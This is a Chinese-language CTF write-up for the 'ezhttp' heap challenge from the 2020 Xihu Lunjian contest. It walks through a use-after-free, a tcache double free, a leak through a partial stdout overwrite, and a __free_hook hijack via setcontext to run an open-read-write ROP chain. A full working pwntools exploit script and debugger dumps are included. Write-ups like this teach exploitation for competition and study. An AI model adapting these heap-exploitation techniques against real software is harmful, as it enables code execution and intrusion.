西湖论剑

2020-10-17

西湖论剑 ezhttp

花了一下午做这题，被没有符号表的libc折磨的死去活来，不知道为啥我电脑ubuntu18的libcTM升级到1.3的没法tcache double free了，赛后自己编译了一个带dbg符号的，再ld_preload就可以了。

这题是道套了层类似http收发形式的堆体，逆这个收发花费了大部分的时间，这个就没什么好说的了，只要写下后面的利用手段吧：

add函数：

v2 = strlen(&src);
  heaplist[2 * i] = malloc(v2);
  if ( !heaplist[2 * i] )
  {
    quit((__int64)"HTTP/1.1 500 INTERNAL SERVER ERROR", (__int64)"Something error!");
    exit(0);
  }
  heaplist[2 * i + 1] = (void *)strlen(&src);
  v3 = strlen(&src);
  strncpy((char *)heaplist[2 * i], &src, v3);

看到它是用strlen获取content的长度，之后malloc再strncpy，strlen会被’\x00’截断，在后面构造时给我带来了不少的麻烦。

dele函数有uaf:

1
2
3

free(heaplist[2 * idx]);
heaplist[2 * idx + 1] = 0LL;                  // UAF
quit((__int64)"HTTP/1.1 200 OK", (__int64)"Delete success!");

edit还是正常的，哦对结尾加个’\n’：

for ( i = 0; src[i] != '\n'; ++i )
  ;
if ( v4 < 0 || v4 > 15 || !heaplist[2 * v4] || i > (__int64)heaplist[2 * v4 + 1] )
{
  quit((__int64)"HTTP/1.1 404 Not Found", (__int64)"No!You can't");
  exit(0);
}
memcpy(heaplist[2 * v4], src, i);

由于没有show，add函数给了我们堆地址因此自然想到double free打tcache的结构体，之后dele0x100的堆进入unsortedbin写入main_arena地址，double free同时改main_arena后2字节来打stdout，但由于add时的’\x00’限制，要改写地址为stdout上面的地址，并填充’a’但0xfbad18不能改，其他都填’a’，开始以为不行，但仍能成功泄露，有点nb，之后由于有seccomp所以改free_hook为setcontext+53，并在0x100的堆里写payload，之后dele。利用setcontext+53来构造寄存器(rdi=0,rsi=heap+0xa0,rdx=0x200)，rsp改到heap+0xa8，之后返回时去执行read读入后续的shellcode到栈里面rsp位置然后ret到shellcode来orw。

pwndbg> telescope 0x555556d1f320
00:0000│   0x555556d1f320 ◂— 0x67616c662f2e /* './flag' */
01:0008│   0x555556d1f328 ◂— 0x0
... ↓
pwndbg> telescope 0x555556d1f320 100
00:0000│      0x555556d1f320 ◂— 0x67616c662f2e /* './flag' */
01:0008│      0x555556d1f328 ◂— 0x0
... ↓
0e:0070│      0x555556d1f390 —▸ 0x555556d1f3c0 —▸ 0x7fb514444a78 (mblen+104) ◂— pop    rax
0f:0078│      0x555556d1f398 —▸ 0x555556d21000 ◂— 0x0
10:0080│      0x555556d1f3a0 ◂— 0x200
... ↓
12:0090│      0x555556d1f3b0 ◂— 0x0
... ↓
14:00a0│ rsi  0x555556d1f3c0 —▸ 0x7fb514444a78 (mblen+104) ◂— pop    rax
... ↓
17:00b8│      0x555556d1f3d8 ◂— 0x0
18:00c0│      0x555556d1f3e0 —▸ 0x7fb5144d39d5 (__time_syscall+5) ◂— syscall
19:00c8│ rsp  0x555556d1f3e8 ◂— 0x6161616161616161 ('aaaaaaaa')

exp:

from pwn import *
context.log_level='debug'
context.arch='amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def add(content):
    p.recvuntil("======= Send Http packet to me: ========\n")
    p.send(('POST /create Cookie: user[^=admin token: \r\r\n\r\ncontent={} ').format(content))

def dele(idx):
    p.recvuntil("======= Send Http packet to me: ========\n")
    p.send(('POST /del Cookie: user[^=admin token: \r\r\n\r\nindex={} ').format(idx))

def edit(idx,content):
	# sleep(0.5)
	p.recvuntil("======= Send Http packet to me: ========\n")
	p.send(('POST /edit Cookie: user[^=admin  token: \r\r\n\r\nindex={0}&content={1}&').format(idx,content))

def add2(content):
    p.recvuntil("======= Send Http packet to me: ========")
    p.send(('POST /create Cookie: user[^=admin token: \r\r\n\r\ncontent={} ').format(content))

def dele2(idx):
    p.recvuntil("======= Send Http packet to me: ========")
    p.send(('POST /del Cookie: user[^=admin token: \r\r\n\r\nindex={} ').format(idx))

def edit2(idx,content):
	# sleep(0.5)
	p.recvuntil("======= Send Http packet to me: ========")
	p.send(('POST /edit Cookie: user[^=admin  token: \r\r\n\r\nindex={0}&content={1}&').format(idx,content))

def main(host,port=55504):
	global p
	if host:
	    p=remote(host,port)
	else:
	    p=process(["/home/an9ela/glibc-all-in-one/libs/2.27-3ubuntu1.2_amd64/ld-2.27.so","./ezhttp"],env={"LD_PRELOAD":"/home/an9ela/glibc-all-in-one/libs/2.27-3ubuntu1.2_amd64/libc-2.27.so"})
	    # p=process("./ezhttp")

	add('a'*0x40)
	p.recvuntil("Your gift: ")
	heap=int(p.recv(14),16)
	success("heap: "+hex(heap))
	add('b'*0x40)
	# dele(1)
	dele(0)
	dele(0)
	# debug(0x0000000000019E3)

	add('a'*0x40)
	dele(0)
	edit(2,p64(heap-0x250)[:6]+'\n')
	add('a'*0x40)
	add('\xff'*0x40)
	add('a'*0x10)
	add('a'*0x100)
	add('a'*0x30)
	dele(6)
	add('a'*0x100)
	dele(6)
	edit(4,p8(0x1)*0x40+'\n')

	dele(0)
	dele(0)
	edit(2,p64(heap+0xa0+0x20)[:6]+'\n')
	gdb.attach(p)
	stdout=int(raw_input('input: '),16)
	edit(8,p16(stdout)+'\n')
	add('a'*0x40)
	add('a'*0x40)
	# add('a'*0x40)
	# debug(0x0001A78)
	add('a'*0x1f+p32(0xfbad1801)+'a'*4 + 'a'*0x18 +'a')
	# p.recvuntil('a'*0x1f)
	libc.address=u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))-0x3ec761
	success("libc: "+hex(libc.address))
	edit2(11,p64(0xfbad1800) + p64(0) * 3 +p8(0xc8)+'\n')
	dele2(0)
	edit2(2,p64(libc.sym['__free_hook']-0x38)+'\n')
	add2('a'*0x40)
	add2('a'*0x38+p64(libc.address+0x52145)[:6])
	edit2(1,'/bin/sh\x00\n')

	heap -= 0x260

	p_rdi = 0x2155f+libc.address
	p_rdx_rsi = 0x130889+libc.address
	p_rax = 0x43a78+libc.address
	syscall_ret = 0xd29d5+libc.address
	payload = ''
	payload += './flag'+'\x00'*2
	payload += p64(0)*12	#offset 0x68
	payload += p64(0)	#rdi
	payload += p64(heap+0x320+0xa0)		#rsi
	payload += p64(heap+0x2000)	#rbp
	payload += p64(0x200)*2		#rbx and rdx
	payload += p64(0)*2
	payload += p64(heap+0x320+0xa8)	# rsp
	payload += p64(p_rax)		#rcx
	payload += p64(p_rax)
	payload += p64(0)+p64(syscall_ret)

	edit2(8,payload+'\n')

	#gdb.attach(p)
	dele2(6)

	#pause()

	rop_chain = [
		p_rdi,heap+0x320,p_rdx_rsi,0,0,p_rax,2,syscall_ret,
		p_rdi,4,p_rdx_rsi,0x100,heap+0x2000,p_rax,0,syscall_ret,
		p_rdi,1,p_rax,1,syscall_ret
	]
	gdb.attach(p)
	p.send("A"*0x28+flat(rop_chain))

	p.interactive()


if __name__ == '__main__':
    libc=ELF("./libc-2.27.so")
    # libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    main(0)

libc使用的时glibc all in one里面的，download时候也一起把dbg符号一起下载了，之后编译一下就能用了。